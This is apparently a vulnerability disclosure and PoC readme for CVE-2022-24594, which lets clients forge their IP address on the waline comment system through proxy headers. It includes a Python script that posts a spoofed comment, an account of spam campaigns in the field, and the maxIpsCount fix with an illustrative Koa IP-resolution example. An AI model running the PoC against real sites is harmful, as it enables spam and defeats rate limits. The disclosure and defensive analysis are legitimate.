Headline
CVE-2022-24594: [Bug]: waline fake any ip vulnerability · Issue #785 · walinejs/waline
In waline 1.6.1, an attacker can submit messages using X-Forwarded-For to forge any IP address.
Describe the bug
waline-fake-any-ip-poc
A Proof-Of-Concept for the recently found waline fake any ip vulnerability.
In this repository we have made an example vulnerable application and a proof-of-concept (POC) exploit for it.
Proof-of-concept (POC)
As a PoC we have created a python file that automates the process.
Requirements:
Usage:
Source:
```python
# poc.py
# ======= Disclaimer: =========================================================
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
import random

import requests


def getRandStr(length):
    """Return a random alphanumeric string of the given length."""
    alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    return "".join(random.choice(alphabet) for _ in range(length))


attack_url = "https://waline-test-poc.vercel.app"  # This is the test deployment URL
fake_ip = "This is a fake IP " + getRandStr(6)  # This is a fake IP or any other string

headers = {}
headers["User-Agent"] = "Mozilla/5.0 test " + getRandStr(6)
headers["X-Forwarded-For"] = "0.0.0.0"
headers["True-Client-IP"] = fake_ip  # fake ip

data = {
    "comment": "test comment " + getRandStr(6),
    "nick": "test nick " + getRandStr(6),
    "mail": getRandStr(6) + "@test.com",
    "link": "https://" + getRandStr(6) + ".com",
    "ua": "Mozilla/5.0 test " + getRandStr(6),
    "url": "/",
}

res = requests.post(url=attack_url + "/comment", headers=headers, data=data)
print(res.text)
```
Result:
Our vulnerable application
waline deploy:
- @waline/vercel 1.6.0
- @waline/client 1.5.2
data store:
- LeanCloud
get started:
https://waline.js.org/guide/get-started.html
Influence
IP-based comment posting frequency limits (IPQPS) may be rendered useless.
This vulnerability can be used to fake the IP address and bypass the IP frequency limit of the comment system software (waline), so that the comment system administrator cannot accurately obtain the IP address of the sender.
Reason
This vulnerability is usually caused by a misconfiguration on the server side.
References
- #785
- #792
Exploit in the field
According to the GitHub issues of the waline project, from July 18 to July 20, 2021, an attacker bombarded all websites using Waline by posting spam comments with faked IP addresses, so it is speculated that this vulnerability has been exploited in the field.
- #786
- #430
- #424
- #427
Solutions
Software maintainers have provided a solution to this vulnerability.
There is nothing we can do about it on Vercel. But we should be able to block these requests on a self-hosted env. (#792, reply in thread)
In self-host mode, we can set maxIpsCount to the number of proxy server layers to get a real IP. https://koajs.com/#settings (#792, reply in thread)
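To see what the maxIpsCount setting changes, here is an added example (not waline's or Koa's own code) that re-implements Koa's client-IP rules for `app.proxy` and `app.maxIpsCount` as a stand-alone function and runs a constructed spoofed request through the weak and the corrected configuration; the proxy address and forwarded values are made up for the demonstration.

```javascript
// Added example: stand-alone re-implementation of how Koa derives ctx.ip
// from app.proxy and app.maxIpsCount. Not Koa's or waline's own code.

// Split an X-Forwarded-For value the way a proxy chain builds it:
// "client-supplied, proxy1, proxy2" -> each trusted hop appends the peer it saw.
function parseForwardedFor(value) {
  return String(value || '')
    .split(',')
    .map((s) => s.trim())
    .filter(Boolean);
}

// Mirrors Koa's semantics: with proxy off the header is ignored and the TCP
// peer address is the client; with proxy on the header is trusted, and
// maxIpsCount keeps only the last N entries, i.e. the ones appended by the
// N proxy layers that sit in front of the app. The first kept entry wins.
function resolveClientIp({ remoteAddress, forwardedFor, proxy = false, maxIpsCount = 0 }) {
  let ips = proxy ? parseForwardedFor(forwardedFor) : [];
  if (maxIpsCount > 0) ips = ips.slice(-maxIpsCount);
  return ips[0] || remoteAddress || '';
}

// Detection aid: with N trusted layers, everything beyond the last N entries
// was supplied by the client side and is worth logging rather than trusting.
function hasUntrustedHops(forwardedFor, trustedLayers) {
  return parseForwardedFor(forwardedFor).length > trustedLayers;
}

// Constructed request: the client sets the header to an arbitrary string and
// the single reverse proxy (the only trusted layer) appends the real peer.
const spoofed = {
  remoteAddress: '10.0.0.2',                         // the proxy, as seen by Koa
  forwardedFor: 'This is a fake IP, 203.0.113.7',    // client value + proxy append
};

// Weak setting: proxy on, maxIpsCount unset -> the client-supplied entry wins.
const weak = resolveClientIp({ ...spoofed, proxy: true });
// Corrected setting: one proxy layer -> maxIpsCount = 1 -> the proxy's entry wins.
const fixed = resolveClientIp({ ...spoofed, proxy: true, maxIpsCount: 1 });
// No proxy in front of the app: header ignored, the peer address is the client.
const direct = resolveClientIp({ ...spoofed, proxy: false });
```

With `maxIpsCount` matching the real number of proxy layers, anything the client places in the header before the trusted hops no longer reaches the rate limiter or the admin view as the sender's address.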
Disclaimer
This repository is not intended to be a one-click exploit to waline fake any ip vulnerability. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
Our team will not aid, or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or you have permissions to pentest on it.
LICENSE
BSD 3-Clause License
Copyright (c) 2022, ihackerx
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Website URL
https://waline.js.org
Where is your waline deployed?
Vercel (Default)
Where is your comment data stored?
LeanCloud (https://leancloud.app)